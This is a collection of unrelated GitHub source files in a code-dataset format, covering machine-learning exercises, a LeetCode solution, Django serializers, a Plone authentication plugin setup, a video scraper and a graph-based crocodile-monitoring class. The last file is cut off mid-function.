gen_feature(df)\n\n features = [\n \"avg_weighted_score\",\n \"max_weighted_score\",\n \"avg_hashtag_age\",\n \"max_hashtag_age\",\n \"min_hashtag_age\",\n \"max_hashtag_life\",\n \"avg_hashtag_life\",\n \"max_score\",\n \"count_for_score\",\n \"avg_score\",\n ]\n\n train = df[df[\"split\"] == TRN_SET]\n validation = df[df[\"split\"] == VAL_SET]\n test = df[df[\"split\"] == TST_SET]\n\n logging.info(\"saving training features\")\n train[features].to_csv(train_feature_file, index=False, compression=\"gzip\")\n logging.info(\"saving validation features\")\n validation[features].to_csv(valid_feature_file, index=False, compression=\"gzip\")\n logging.info(\"saving testing featured\")\n test[features].to_csv(test_feature_file, index=False, compression=\"gzip\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--train-file\", required=True, dest=\"train_file\")\n parser.add_argument(\"--valid-file\", required=True, dest=\"valid_file\")\n parser.add_argument(\"--test-file\", required=True, dest=\"test_file\")\n parser.add_argument(\"--feat-name-file\", required=True, dest=\"feat_name_file\")\n parser.add_argument(\"--sol-file\", required=True, dest=\"sol_file\")\n parser.add_argument(\n \"--train-feature-file\", required=True, dest=\"train_feature_file\"\n )\n parser.add_argument(\n \"--valid-feature-file\", required=True, dest=\"valid_feature_file\"\n )\n parser.add_argument(\"--test-feature-file\", required=True, dest=\"test_feature_file\")\n\n args = parser.parse_args()\n start = time.time()\n main(\n args.train_file,\n args.valid_file,\n args.test_file,\n 
args.feat_name_file,\n        args.sol_file,\n        args.train_feature_file,\n        args.valid_feature_file,\n        args.test_feature_file,\n    )\n\n    logging.info(\"finished ({:.2f} sec elapsed)\".format(time.time() - start))\n","repo_name":"nthanhtam/cikm-cup-2020","sub_path":"src/9_gen_feature_v3.py","file_name":"9_gen_feature_v3.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"25562705805","text":"import tensorflow as tf\r\ntf.compat.v1.set_random_seed(66)\r\n\r\nx_data = [[73, 80, 75], # (5, 3)\r\n          [93, 88, 93],\r\n          [89, 91, 90],\r\n          [96, 98, 100],\r\n          [73, 66, 70]]\r\n\r\ny_data = [[152], [185], [180], [196], [142]] # (5, 1)\r\n\r\nx = tf.compat.v1.placeholder(tf.float32, shape=[None, 3]) # n, 3 <- 3 is the number of rows of w\r\ny = tf.compat.v1.placeholder(tf.float32, shape=[None, 1]) # n, 1 <- 1 is the number of columns of w\r\n\r\nw = tf.Variable(tf.random.normal([3, 1]), name='weight') # matrix multiplication shape: (n, m) * (m, s) = (n, s)\r\nb = tf.Variable(tf.random.normal([1]), name='bias')\r\n\r\n# hypothesis = x * w + b\r\nhypothesis = tf.matmul(x, w) + b\r\n\r\n#3-1. compile\r\nloss = tf.reduce_mean(tf.square(hypothesis-y)) # mse\r\n\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=4e-5)\r\n# optimizer = tf.train.AdamOptimizer(learning_rate=4e-5)\r\ntrain = optimizer.minimize(loss)\r\n\r\n#3-2. train\r\nsess = tf.compat.v1.Session()\r\nsess.run(tf.compat.v1.global_variables_initializer())\r\n\r\nfor epochs in range(70001):\r\n    _, loss_v, w_v , b_v = sess.run([train, loss, w, b], feed_dict={x:x_data, y:y_data})\r\n    # print(epochs, '\\t', loss_v, '\\t' , w_v, '\\t', b_v)\r\n    if epochs % 1000 == 0:\r\n        # print(step, sess.run(loss), sess.run(W), sess.run(b))\r\n        print(epochs, loss_v, w_v[0][0],w_v[1][0],w_v[2][0], b_v)\r\n\r\nfrom sklearn.metrics import r2_score, mean_absolute_error\r\n\r\ny_predict = tf.matmul(x, w_v) + b_v\r\ny_predict_data = sess.run(y_predict, feed_dict={x: x_data})\r\n# print(y_pred)\r\nr2 = r2_score(y_data, y_predict_data)\r\nprint('r2 : ', r2)\r\n\r\nmae = mean_absolute_error(y_data, y_predict_data)\r\nprint(\"mae : \", mae)\r\n \r\nsess.close()\r\n\r\n# Adam\r\n# r2 :  0.9997270494853739\r\n# mae :  0.3134674072265625\r\n\r\n# r2 :  0.9996362453297368\r\n# mae :  0.321002197265625\r\n\r\n# r2 :  0.9995678495205169\r\n# mae :  0.3292327880859375","repo_name":"Myungj/study","sub_path":"tf114/tf12_mv2.py","file_name":"tf12_mv2.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36221674867","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n#     def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n#         node = ListNode()\n#         tail = node\n#         merged = []\n        \n#         for i in range(len(lists)):\n#             l = lists[i]\n#             while l:\n#                 merged.append(l.val)\n#                 l = l.next\n#         merged.sort()\n        \n#         for i in merged:\n#             tail.next = ListNode(i)\n#             tail = tail.next\n        \n#         return node.next\n    def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n        if not lists or len(lists) < 1:\n            return None\n        \n        while len(lists) > 1:\n            mergedList = []\n            \n            for i in range(0, len(lists), 2):\n                list1 = lists[i]\n                list2 = lists[i + 1] if (i + 1) < len(lists) else None\n                mergedList.append(self.mergeList(list1, list2))\n            lists = mergedList\n        return lists[0]\n    \n    \n    def mergeList(self, l1, l2):\n        node = ListNode()\n        tail = node\n        
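# note: the divide-and-conquer loop above merges lists pairwise, halving the\n        # count each round (e.g. 8 -> 4 -> 2 -> 1), so every node is merged O(log k)\n        # times for O(N log k) total work versus O(N k) for one-at-a-time merging.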
\n \n while l1 and l2:\n if l1.val < l2.val:\n tail.next = l1\n l1 = l1.next\n else:\n tail.next = l2\n l2 = l2.next\n tail = tail.next\n \n if l1:\n tail.next = l1\n elif l2:\n tail.next = l2\n \n return node.next\n \n \n ","repo_name":"orangdong/LeetCode","sub_path":"0023-merge-k-sorted-lists/0023-merge-k-sorted-lists.py","file_name":"0023-merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10042035352","text":"from rest_framework import validators\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.relations import SlugRelatedField\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom comments.models import Comment\nfrom buildings.models import Building, BuildingImage, Status\nfrom users.models import (Renter, RenterProfile, Landlord, LandlordProfile)\nfrom buildings.models import Building, BuildingImage, Bookings\n\n\n\nclass RenterProfileSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = RenterProfile\n fields = ('__all__')\n\n\nclass LandlordProfileSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = LandlordProfile\n fields = ('__all__')\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(\n read_only=True, slug_field='email'\n )\n\n class Meta:\n model = Comment\n fields = (\n 'author',\n 'text',\n 'pub_date',\n 'score',\n 'building'\n )\n\n\nclass BuildingImageModelSerializer(ModelSerializer):\n class Meta:\n model = BuildingImage\n fields = ('image',)\n\n\nclass StatusSerializer(serializers.ModelSerializer):\n class Meta:\n model = Status\n fields = (\n 'stat',\n 'reject_text',\n 'building',\n )\n\n\nclass BuildingGetSerializer(ModelSerializer):\n building_images = BuildingImageModelSerializer(\n many=True\n )\n rating = serializers.FloatField()\n building_status = StatusSerializer(many=True)\n\n class Meta:\n model = Building\n fields = (\n 'id',\n 'owner',\n 'title',\n 'specialization',\n 'desc',\n 'address',\n 'coordinates',\n 'operating_hours',\n 'site',\n 'area_sum',\n 'area_rent',\n 'features',\n 'additional_information',\n 'building_images',\n 'capacity',\n 'cost',\n 'booking',\n 'rating',\n 'building_status',\n 'entity',\n 'phone',\n 'email',\n 'inn',\n )\n\n\nclass BuildingPostSerializer(ModelSerializer):\n building_images = BuildingImageModelSerializer(\n source='buildingimage_set',\n many=True, read_only=True\n )\n building_status = StatusSerializer(\n read_only=True,\n source='status_set'\n )\n\n \n class Meta:\n model = Building\n fields = (\n 'id',\n 'owner',\n 'title',\n 'specialization',\n 'desc',\n 'address',\n 'coordinates',\n 'operating_hours',\n 'site',\n 'area_sum',\n 'area_rent',\n 'features',\n 'additional_information',\n 'building_images',\n 'capacity',\n 'cost',\n 'booking',\n 'entity',\n 'phone',\n 'email',\n 'inn',\n 'building_status'\n )\n\n def create(self, validated_data):\n images_data = self.context.get('view').request.FILES\n building = Building.objects.create(**validated_data)\n for image_data in images_data.values():\n BuildingImage.objects.create(building=building, image=image_data)\n return building\n \n\nclass BookingsSerializer(serializers.ModelSerializer):\n renter = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = Bookings\n fields = (\n 'id',\n 'renter',\n 'building',\n 'check_in',\n 'check_out',\n 'message',\n 'approve',\n 'status'\n 
)","repo_name":"Trohimets/createdin.moscow","sub_path":"backend/createdin/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29207424463","text":"# 1\ndef number_of_food_groups():\n return 5\n\n\nprint(number_of_food_groups())\n# 5\n\n\n# 2\ndef number_of_military_branches():\n return 5\n\n\nprint(\n number_of_days_in_a_week_silicon_or_triangle_sides() + number_of_military_branches()\n)\n# output: NameError, number_of_days_in_a_week_silicon_or_triangle_sides not defined\n\n\n# 3\ndef number_of_books_on_hold():\n return 5\n return 10\n\n\nprint(number_of_books_on_hold())\n# output: 5, function breaks after first return\n\n\n# 4\ndef number_of_fingers():\n return 5\n print(10)\n\n\nprint(number_of_fingers())\n# output: 5, function breaks after first return, it never reaches the print\n\n\n# 5\ndef number_of_great_lakes():\n print(5)\n\n\nx = number_of_great_lakes()\nprint(x)\n# output: 5 and None, x = none because the function doesn't return anything\n\n\n# 6\ndef add(b, c):\n print(b + c)\n\n\nprint(add(1, 2) + add(2, 3))\n# output: 3 and 5 because it is printing b+c and not returning it's value\n\n\n# 7\ndef concatenate(b, c):\n return str(b) + str(c)\n\n\nprint(concatenate(2, 5))\n# output: 25, it adds the two values as strings, \"2\" + \"5\" = \"25\"\n\n\n# 8\ndef number_of_oceans_or_fingers_or_continents():\n b = 100\n print(b)\n if b < 10:\n return 5\n else:\n return 10\n return 7\n\n\nprint(number_of_oceans_or_fingers_or_continents())\n# output: 100, 10, first prints b then returns 10 since b is greater than 5\n\n\n# 9\ndef number_of_days_in_a_week_silicon_or_triangle_sides(b, c):\n if b < c:\n return 7\n else:\n return 14\n return 3\n\n\nprint(number_of_days_in_a_week_silicon_or_triangle_sides(2, 3))\nprint(number_of_days_in_a_week_silicon_or_triangle_sides(5, 3))\nprint(\n number_of_days_in_a_week_silicon_or_triangle_sides(2, 3)\n + number_of_days_in_a_week_silicon_or_triangle_sides(5, 3)\n)\n# output: 7, 14, 21\n\n\n# 10\ndef addition(b, c):\n return b + c\n return 10\n\n\nprint(addition(3, 5))\n# output: 8\n\n\n# 11\nb = 500\nprint(b)\n\n\ndef foobar():\n b = 300\n print(b)\n\n\nprint(b)\nfoobar()\nprint(b)\n# output: 500, 500, 300, 500\n\n\n# 12\nb = 500\nprint(b)\n\n\ndef foobar():\n b = 300\n print(b)\n return b\n\n\nprint(b)\nfoobar()\nprint(b)\n# output: 500, 500, 300, 500\n\n\n# 13\nb = 500\nprint(b)\n\n\ndef foobar():\n b = 300\n print(b)\n return b\n\n\nprint(b)\nb = foobar()\nprint(b)\n# output: 500, 500, 300, 300\n\n\n# 14\ndef foo():\n print(1)\n bar()\n print(2)\n\n\ndef bar():\n print(3)\n\n\nfoo()\n# output: 1, 3, 2\n\n\n# 15\ndef foo():\n print(1)\n x = bar()\n print(x)\n return 10\n\n\ndef bar():\n print(3)\n return 5\n\n\ny = foo()\nprint(y)\n# output: 1, 3, 5, 10\n","repo_name":"bobbycoleman-dev/Python","sub_path":"fundamentals/fundamentals/P_functions_basic_i/functions_basic_i.py","file_name":"functions_basic_i.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72933606920","text":"# -*- coding: utf-8 -*-\nfrom pas.plugins.headers.plugins import HeaderPlugin\nfrom pas.plugins.headers.utils import PLUGIN_ID\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.interfaces import INonInstallable\nfrom zope.interface import implementer\n\nimport logging\n\n\nlogger = 
logging.getLogger(__name__)\n\n\n@implementer(INonInstallable)\nclass HiddenProfiles(object):\n def getNonInstallableProfiles(self): # pragma: no cover\n \"\"\"Hide uninstall profile from site-creation and quickinstaller.\"\"\"\n return [\n \"pas.plugins.headers:uninstall\",\n ]\n\n\ndef post_install(context):\n \"\"\"Post install script\"\"\"\n # Setup our request header plugin.\n pas = getToolByName(context, \"acl_users\")\n\n # Create plugin if it does not exist.\n if PLUGIN_ID not in pas.objectIds():\n plugin = HeaderPlugin(\n title=\"Request Headers\",\n )\n plugin.id = PLUGIN_ID\n pas._setObject(PLUGIN_ID, plugin)\n logger.info(\"Created %s in acl_users.\", PLUGIN_ID)\n plugin = getattr(pas, PLUGIN_ID)\n if not isinstance(plugin, HeaderPlugin):\n raise ValueError(\n \"Existing PAS plugin {0} is not a HeaderPlugin.\".format(PLUGIN_ID)\n )\n\n # Activate all supported interfaces for this plugin.\n activate = []\n plugins = pas.plugins\n for info in plugins.listPluginTypeInfo():\n interface = info[\"interface\"]\n interface_name = info[\"id\"]\n if plugin.testImplements(interface):\n activate.append(interface_name)\n logger.info(\n \"Activating interface %s for plugin %s\", interface_name, info[\"title\"]\n )\n\n plugin.manage_activateInterfaces(activate)\n logger.info(\"Plugins activated.\")\n\n # Order some plugins to make sure our plugin is at the top.\n # This is not needed for all plugin interfaces.\n for info in plugins.listPluginTypeInfo():\n interface_name = info[\"id\"]\n if interface_name in [\"IChallengePlugin\", \"IPropertiesPlugin\"]:\n iface = plugins._getInterfaceFromName(interface_name)\n for obj in plugins.listPlugins(iface):\n plugins.movePluginsUp(iface, [PLUGIN_ID])\n logger.info(\"Moved %s to top of %s.\", PLUGIN_ID, interface_name)\n\n\ndef uninstall(context):\n \"\"\"Uninstall script\"\"\"\n from pas.plugins.headers.utils import PLUGIN_ID\n\n pas = getToolByName(context, \"acl_users\")\n\n # Remove plugin if it exists.\n if PLUGIN_ID not in pas.objectIds():\n return\n from pas.plugins.headers.plugins import HeaderPlugin\n\n plugin = getattr(pas, PLUGIN_ID)\n if not isinstance(plugin, HeaderPlugin):\n logger.warning(\n \"PAS plugin %s not removed: it is not a HeaderPlugin.\", PLUGIN_ID\n )\n return\n pas._delObject(PLUGIN_ID)\n logger.info(\"Removed HeaderPlugin %s from acl_users.\", PLUGIN_ID)\n\n\ndef activate_plugin_type(context, plugin_type):\n \"\"\"Activate the plugin_type for our plugin.\n\n plugin_type is an interface.\n \"\"\"\n pas = getToolByName(context, \"acl_users\")\n if PLUGIN_ID not in pas.objectIds():\n logger.warning(\"%s is not in acl_users\", PLUGIN_ID)\n return\n plugin = getattr(pas, PLUGIN_ID)\n if not isinstance(plugin, HeaderPlugin):\n logger.warning(\"Existing PAS plugin %s is not a HeaderPlugin.\", PLUGIN_ID)\n return\n\n # Activate the plugin type.\n plugins = pas.plugins\n plugin_type_name = plugin_type.__name__\n ids = plugins.listPluginIds(plugin_type)\n if PLUGIN_ID not in ids:\n plugins.activatePlugin(plugin_type, PLUGIN_ID)\n logger.info(\"%s plugin activated.\", plugin_type_name)\n else:\n logger.info(\"%s plugin was already activated.\", plugin_type_name)\n\n\ndef activate_credentials_reset_plugin(context):\n from Products.PluggableAuthService.interfaces.plugins import ICredentialsResetPlugin\n\n activate_plugin_type(context, 
ICredentialsResetPlugin)\n","repo_name":"collective/pas.plugins.headers","sub_path":"src/pas/plugins/headers/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"27988811511","text":"# -*- coding: utf-8 -*-\n#@Time : 2021/7/21 12:35 PM\n#@Author : yuming shen\n#@File : 线程池爬取梨视频.py\n#@Software :PyCharm\n\nimport requests\nimport re\nfrom lxml import etree\nfrom multiprocessing.dummy import Pool\n\nheaders = {\n    \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"\n}\nurl = 'http://www.pearvideo.com/category_5'\n\npage_text = requests.get(url=url,headers=headers).text\n\n# parse the listing page\ntree = etree.HTML(page_text)\nli_list = tree.xpath('//ul[@class=\"listvideo-list clearfix\"]/li')\nurls = [] # store every video link and name\nfor li in li_list:\n    detail_ul = 'http://www.pearvideo.com/'+li.xpath('./div/a/@href')[0]\n    detail_name = li.xpath('./div/a/div[2]/text()')[0]+'.mp4'\n    print(detail_name,detail_ul)\n    # request the detail page and parse out the video address\n    detail_page_text = requests.get(url=detail_ul,headers=headers).text\n\n    ex = 'srcUrl=\"(.*?)\",vdoUrl'\n    video_url = re.findall(ex,detail_page_text)[0]\n    dic = {\n        'name':detail_name,\n        'url':video_url\n    }\n    urls.append(dic)\n\ndef get_video_data(dic):\n    url = dic['url']\n    data = requests.get(url=url,headers=headers).content\n    with open(dic['name'],'wb') as fp:\n        fp.write(data)\n\npool = Pool(4)\npool.map(get_video_data,urls)\n\npool.close()\npool.join()\n","repo_name":"yumingshen1/untitled","sub_path":"lufei/线程池爬取梨视频.py","file_name":"线程池爬取梨视频.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15174557957","text":"\"\"\"\nSEMESTER 2/2021 \n\nHIT 200 - ALGORITHMS AND COMPLEXITY\n\nLAB ASSESSMENT 3 \n\nGroup 3 members:\n\nStudent Name Student ID\n1. Dinh Gia Bao Hoang S346284\n2. Mathews Job S341408 \n3. 
Tai Phu Phan S342489 \n\n\"\"\"\n\nfrom typing import Sized\nimport csv\n\nimport math\nimport numpy as np\nsize=100\nclass CrocMonitor:\n locationList =[]\n import csv\n def __init__(self, size):\n \n self.locationList = []\n self.matrix = [[0 for x in range(size)]for y in range(size)]\n self.points=[]\n \n \"\"\"\n self.d: 1D matrix to store the shortest path to current vertex\n self.Trace: 1D matrix to store the previous vertex to the current vertext in the shortest path\n for example: Trace[u] = v, means v is the previous vertex of u in the shortest path\n self.Free: 1D matrix to check whether vertex is visited or not\n for example: Free[u] = True, means vertex u is visited.\n self.Start: the starting vertex\n self.Finish: the finishing vertex\n self.paths: all paths from Start to Finish \n \n \"\"\"\n self.d = [] \n self.Trace = []\n self.Free = [] \n self.Start = 0 \n self.Finish = 0\n self.paths = []\n \n self.readData()\n self.storeDistance()\n\n \"\"\"\n Function: readData(self)\n Purpose: read location file and update location list and the point array.\n Input: None\n Output: None\n Example: readData()\n \n \"\"\"\n def readData(self):\n with open('Locations.csv') as f:\n csv_reader = csv.reader(f)\n index = 0\n next(csv_reader)\n for line in csv_reader:\n \n pointName=line[0]\n x=line[1]\n y=line[2]\n number=line[3]\n edge=line[4]\n \n water=False\n if line[5] == \"W\":\n water=True\n\n self.locationList .append( [pointName, x, y, number, edge, water] ) # etc\n \n if not pointName in self.points:\n \n self.points.append(pointName)\n index += 1\n \n f.close()\n\n \n \"\"\"\n Function: storeDistance(self)\n Purpose: store distance of all adjacent vertices\n Input: None\n Output: None\n Example: storeDistance()\n \n This function will traverse locationList row by row, pick up star point and end point\n calculate distance between the two and store it in the matrix. \n \n This is an undirected graph so matrix[a][b] = matrix[b][a] \n \n \"\"\"\n def storeDistance(self):\n \n for index in range(0, len(self.locationList)-1):\n \n startpoint = self.locationList[index][0]\n endpoint = self.locationList[index][4]\n \n if startpoint != \"\" and endpoint != \"\":\n distance = self.computeDistance(startpoint, endpoint)\n \n #position in the adjacent matrix\n indexa = self.points.index(startpoint)\n indexb = self.points.index(endpoint)\n \n #add the weighting of the edge\n self.matrix[indexa][indexb] = distance\n self.matrix[indexb][indexa] = distance \n \n \"\"\"\n Function: computePathDistance(self, path)\n Purpose: compute distance of all the connected vertices in a path \n Input: a path including all connected vertices\n Output: distance of a given path\n Example: computePathDistance(self, [\"15\",\"16\",\"18\"])\n \n \"\"\"\n def computePathDistance (self,path):\n \n #provide the distance between two points a and b, as the end points on a path. 
Assume not adjacent\n distance=0\n \n for i in range(len(path)-1):\n distance = distance + self.matrix[self.points.index(path[i])][self.points.index(path[i+1])] \n \n return distance \n \n \n \"\"\"\n Function: computeDistance(self, a, b)\n Purpose: compute distance of two adjacent location\n Input: location a and b\n Output: distance of adjacent location\n Example: computeDistance(\"15\",\"18\")\n \n This function will find the index of location a and b in the location list,\n get the respective x and y, then calculate the distance using the pythago \n theorem between two points\n \n \"\"\"\n def computeDistance (self, a, b):\n \n # provide the distance between two points a and b on a path. Assume adjacent\n distance=0\n \n #convert locationList into numpy list for searching purpose\n l = np.array(self.locationList)[:,0] \n \n #index of a and b in the location list\n indexa = np.where(l==a)[0][0]\n indexb = np.where(l==b)[0][0]\n \n xa = int(self.locationList[indexa][1])\n ya = int(self.locationList[indexa][2])\n xb = int(self.locationList[indexb][1])\n yb = int(self.locationList[indexb][2])\n \n #calculate distance between a and b\n distance = math.sqrt((xa-xb)**2 + (ya-yb)**2)\n \n return distance\n\n \"\"\"\n Function: findPath(self, a, b)\n Purpose: finding the shortest path from a to\n Input: location a and b\n Output: shortest path and distance\n Example: findPath(\"15\",\"18\") -> [\"15\",\"16\",\"18\"], 8.94\n \n This function finds the shortest path from a to b, and based on the Dijkstra algorithm \n \n \"\"\"\n def findPath(self,a,b):\n #returns shortest path a to b\n \n #init the Graph\n self.InitGraph(a,b)\n #assume the infinity number\n MAX = 1000000\n path = [] \n \n while True:\n min = MAX+1\n u = 0 \n \n #finding the vertex which having shortest path\n for i in range(len(self.points)):\n if self.Free[i] and min > self.d[i]:\n min = self.d[i]\n u = i\n \n #if the Finish vertex is reached\n if u == self.Finish: \n break\n \n # vertex u is marked as visited (i.e. not free)\n self.Free[u] = False \n \n for v in range(len(self.points)):\n if self.matrix[u][v] != 0: \n #if the shortest path from Start to vertex v greater than \n #the shortest path from Start to u and distance from u to v\n #then update the distance from Start to v \n if self.d[v] > self.d[u] + self.matrix[u][v]:\n self.d[v] = self.d[u] + self.matrix[u][v]\n self.Trace[v] = u\n \n #trace the shortest path\n if self.d[self.Finish] == MAX: #no path from Start to End\n self.d[self.Finish] = -1\n else:\n u = self.Finish\n while self.Start != u:\n path.append(self.points[u])\n u = self.Trace[u] \n path.append(self.points[self.Start]) \n path.reverse() \n \n return path, self.d[self.Finish] \n\n\n \"\"\"\n Function: computCosting(self, a, b)\n Purpose: find all points on path between a and b, then adding neighbours of internal points on path \n Input: location of a and b\n Output: exhausitve path and costing\n Example: computeCosting(\"15\",\"18\") -> ['15','16','17','16','18'], 0.45\n \n \"\"\"\n def computeCosting(self, a, b):\n # unit costs for scanning all points on all paths between two locations and give exhaustive path for rangers to follow, returned as an list\n path=[]\n costing=0\n speed = 40 \n distance = 0\n \n #all points on path between two locations, and the exhaustive search (i.e. 
neighbours of internal)\n pointList, path = self.findScope(a, b)\n \n print(\"All points for rangers to inspect: \", pointList)\n print(\"Exhaustive search path: \", path)\n for i in range(len(path)-1):\n #get the distance between two adjacent vertices through location matrix\n d = self.matrix[self.points.index(path[i])][self.points.index(path[i+1])] \n\n #add-up the distance of the path\n distance = distance + d\n \n #format the output string\n if (i-1) >0 and path[i+1] == path[i-1]:\n str = path[i+1] + \" <- \" + path[i] + \": %.2f\"%d\n else:\n str = path[i] + \" -> \" + path[i+1] + \": %.2f\"%d \n \n print(str)\n \n #calcualte costing given assumed speed.\n costing = distance/speed \n \n print(\"Distance (km): %.2f\"%distance,\". Speed (km/h): %.2f\"%speed,\". Cost (units of hour): %.2f\"%costing)\n \n return costing,path\n \n \"\"\"\n Function: improveDistance(self, a, b)\n Purpose: find the shortest path from a to be, suggest the possible points to be blocked \n Input: location and and b\n Output: array of possible points to be blocked\n Example: improveDistance(\"15\",\"18\") -> ['Point: 16', 'Distance: 2.24', 'Ratio: 0.25']\n \n \"\"\"\n def improveDistance (self, a, b):\n #return point blocked as a value on map (eg A1) and scaled increase in distance between points\n points=[]\n scaledImprovement=0\n d = 0\n \n #find the shortest path between a and b\n path, shortest = self.findPath(a, b)\n print(f\"\\nThe shortest path: {path}\")\n print(\"Total distance: %.2f\"%shortest)\n \n #check for all internal points within the shortest path \n #if there is any neighbour then that point will be tracked for ranger to consider\n for i in range(1,len(path)-1):\n k = self.points.index(path[i])\n z = self.points.index(path[i-1])\n #calculate accumulated distance\n d += self.matrix[k][z]\n #check wether any point in the shortest path has neihgbour\n for j in range(len(self.points)):\n #if found any neighbour from point j then track the place for blockage\n if self.matrix[k][j] != 0 and self.points[j] not in path:\n points.append([\"Point: \"+path[i],\"Distance: %.2f\"%d,\"Ratio: %.2f\"%(d/shortest)])\n \n return points #,scaledImprovement\n\n\n \"\"\"\n Function: countCroc(self, beach, x)\n Purpose: find a location within the radius of the beach and number of crocs\n Input: beach and radius\n Output: list of location near the beach and the number of crocs\n Example: countCroc(\"B1\",10) -> [['22',1.0]\n ['B2',0.0]]\n \n \"\"\"\n \n def countCroc(self, beach, x):\n #count the number of crocs likely in a x mile radius of a beach. 
Return an array [location, number]\n \n #list of points within the radius of the beach\n list = []\n \n #convert locationList to numpy list for searching\n l = np.array(self.locationList)[:,0] \n \n nearest_point = \"\"\n nearest_distance = float(\"inf\")\n \n for i in range(len(self.points)):\n \n #distance between the beach and any point\n d = self.computeDistance(beach, self.points[i])\n \n #if less than radius\n if d > 0 and d <= x:\n \n #get the number of crocs\n j = np.where(l==self.points[i])[0][0] \n \n if self.locationList[j][3] != \"\":\n crocs = float(self.locationList[j][3])\n else: crocs = 0.\n \n list.append([self.points[i],crocs])\n \n #check nearest point \n if nearest_distance > d:\n nearest_distance = d\n nearest_point = [self.points[i],crocs]\n \n #last element is the nearest\n if nearest_point != \"\":\n list.append(nearest_point)\n \n return list\n \n \"\"\"\n Function locatOptimalBlockage(self, beach, radius, list)\n Purpose: find the nearest point to the beach, all shortest path from other point within radius to that nearest point\n Input: beach, radius and the list of points within the radius of the beach.\n Output: nearest point, list of shortest path to the nearest point and no of crocs.\n Example: locateOptimalBlockage(\"B3\",\"10\",list)\n \n \n \"\"\"\n def locateOptimalBlockage(self,beach,radius, list):\n # return the point blocked eg A1 and the increase in protection provided using some weighting\n point=\"\"\n protection=1\n crocs = 0\n paths = []\n \n if len(list) == 0:\n return \"\", None\n \n print(f\"\\nAll locations and number of crocs are within the radius {radius} of {beach}\")\n for i in range(len(list)-1):print(list[i])\n \n #nearest point to the beach (the last item in list)\n point = list[len(list)-1][0] \n \n #convert to list for counting the crocs\n #dic = {l[0]:l[1] for l in list}\n dic = dict(list)\n #find the shortest path from all points within radius to the nearest point and accumulate the crocs from the path\n for d in dic:\n if d != point:\n path,_ = self.findPath(d,point)\n crocs = 0\n for p in path:\n if p not in dic: \n crocs = 0\n break\n crocs += dic[p]\n \n if crocs !=0: \n paths.append([path,\"Crocs: %.2f\"%crocs])\n \n return point, paths #protection\n\n\n \"\"\"\n Function: MinTime(self, a, b)\n Purpose: points travelled through the shorest path from a to b \n Input: location a and b\n Output: array of points travelled and time value:\n Example: MinTime(\"15\", \"18\")\n -> points: [\"15\",\"16\",\"18\"]\n time value (hours): 0.56\n \n \"15\" -> \"16\" (water), distance: 2.36, speed: 16 (km/h), time value: 2.36/16 = 0.14\n \"16\" -> \"18\" (water), distance: 6.71, speed: 16 (km/h), time value: 6.71/16 = 0.42\n Total time value (hours): 0.56\n \n \"\"\"\n def minTime(self,a,b):\n #return list of points trevelled and the time required\n \n time = 0\n path = []\n trace = []\n water = \"\"\n \n #converst locationList to numpy list for search purpose\n l = np.array(self.locationList)[:,:] \n \n #finding the shortest path\n path,shortest = self.findPath(a, b) \n \n for i in range(len(path)-1,0,-1):\n #check the index of path[i-1] to path[i] in the locationList \n #l[:,0] is the first column of locationList: sight name\n #l[:,4] is the fifth column of locationList: neighbour\n j = np.where( (l[:,0]==path[i-1]) & (l[:,4]==path[i]))[0]\n \n #if not then search again in the listlocation\n #just change the path[i] to the first column and path[i-1] in the fifth column\n if len(j) == 0:\n j = np.where( (l[:,0]==path[i]) & 
(l[:,4]==path[i-1]))[0]\n \n #check the the given location of a and be is water or land, column 5 in listLocation\n if self.locationList[j[0]][5] == True:\n speed = 16.0\n water = \"Water\"\n else: \n speed = 6.0\n water = \"Land\"\n #find the index of two locations\n f = self.points.index(path[i-1])\n t = self.points.index(path[i])\n \n #calculate the unit of time given distance of two adjacent locations\n distance = self.matrix[f][t]\n time = time + distance/speed\n \n trace.insert(0,[path[i-1] + \"->\" +path[i],water,\n \"Distance: %.2f\"%distance,\n \"Speed: %.1f\"%speed,\n \"Time: %.2f\"% (distance/speed)])\n \n return path, trace, shortest,time\n \n\n \"\"\"\n Function: findScope(a, b)\n Purpose:\n Input: location a and b\n Output: pointList and exhaustive path \n Example: findScope(\"15\",\"18\") \n -> poinstList = [\"15\",\"16\",\"17\",\"18\"]\n exhaustive path = [\"15\",\"16\",\"17\",\"16\",\"18\"]\n \n This function will find the shortest path from a to b, add the neighbours for internal points\n between the path except a and b, the exhaustive path is built on these points\n \n \n \"\"\" \n def findScope(self, a, b):\n #provide start and end point of search, collect points to consider in search\n pointList=[a,b]\n expath = [a,b]\n \n #find location of a and b 